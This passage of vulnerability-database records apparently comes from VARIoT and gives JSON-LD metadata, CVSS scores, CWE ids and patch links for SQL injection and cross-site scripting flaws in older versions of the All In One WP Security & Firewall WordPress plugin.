        "trust": 0.6
      }
    }

    VAR-201908-1073

    Vulnerability from variot - Updated: 2024-11-23 23:01

    The all-in-one-wp-security-and-firewall plugin before 4.0.7 for WordPress has multiple SQL injection issues. WordPress for all-in-one-wp-security-and-firewall Plug-ins include SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The vulnerability stems from the lack of verification of externally input SQL statements in database-based applications. Attackers can exploit this vulnerability to execute illegal SQL commands

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1073",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "4.0.7"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "4.0.7"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10888"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          }
        ]
      },
      "cve": "CVE-2016-10888",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2016-10888",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-89709",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2016-10888",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2016-10888",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2016-10888",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201908-1057",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-89709",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89709"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10888"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The all-in-one-wp-security-and-firewall plugin before 4.0.7 for WordPress has multiple SQL injection issues. WordPress for all-in-one-wp-security-and-firewall Plug-ins include SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The vulnerability stems from the lack of verification of externally input SQL statements in database-based applications. Attackers can exploit this vulnerability to execute illegal SQL commands",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2016-10888"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "db": "VULHUB",
            "id": "VHN-89709"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2016-10888",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1057",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-89709",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89709"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10888"
          }
        ]
      },
      "id": "VAR-201908-1073",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89709"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T23:01:42.825000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "title": "WordPress all-in-one-wp-security-and-firewall Plugin SQL Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96734"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89709"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10888"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10888"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10888"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89709"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10888"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-89709"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10888"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-14T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89709"
          },
          {
            "date": "2019-08-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "date": "2019-08-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          },
          {
            "date": "2019-08-14T16:15:12.033000",
            "db": "NVD",
            "id": "CVE-2016-10888"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-19T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89709"
          },
          {
            "date": "2019-08-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "date": "2019-08-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          },
          {
            "date": "2024-11-21T02:44:59.720000",
            "db": "NVD",
            "id": "CVE-2016-10888"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress for  all-in-one-wp-security-and-firewall In the plugin  SQL Injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201908-1203

    Vulnerability from variot - Updated: 2024-11-23 22:58

    The all-in-one-wp-security-and-firewall plugin before 3.9.5 for WordPress has XSS in add_query_arg and remove_query_arg function instances. WordPress for all-in-one-wp-security-and-firewall The plug-in contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1203",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "3.9.5"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "3.9.5"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9294"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          }
        ]
      },
      "cve": "CVE-2015-9294",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2015-9294",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-87255",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "id": "CVE-2015-9294",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.8,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-9294",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2015-9294",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201908-841",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-87255",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9294"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The all-in-one-wp-security-and-firewall plugin before 3.9.5 for WordPress has XSS in add_query_arg and remove_query_arg function instances. WordPress for all-in-one-wp-security-and-firewall The plug-in contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-9294"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "db": "VULHUB",
            "id": "VHN-87255"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2015-9294",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-841",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-87255",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9294"
          }
        ]
      },
      "id": "VAR-201908-1203",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87255"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T22:58:36.462000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "title": "WordPress all-in-one-wp-security-and-firewall Fixes for plugin cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96532"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9294"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-9294"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-9294"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9294"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-87255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9294"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-87255"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "date": "2019-08-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          },
          {
            "date": "2019-08-13T17:15:11.687000",
            "db": "NVD",
            "id": "CVE-2015-9294"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-16T00:00:00",
            "db": "VULHUB",
            "id": "VHN-87255"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          },
          {
            "date": "2024-11-21T02:40:16.507000",
            "db": "NVD",
            "id": "CVE-2015-9294"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress for  all-in-one-wp-security-and-firewall Plug-in vulnerable to cross-site scripting",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201908-1125

    Vulnerability from variot - Updated: 2024-11-23 22:29

    The all-in-one-wp-security-and-firewall plugin before 4.0.5 for WordPress has XSS in the blacklist, file system, and file change detection settings pages. WordPress for all-in-one-wp-security-and-firewall The plug-in contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1125",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
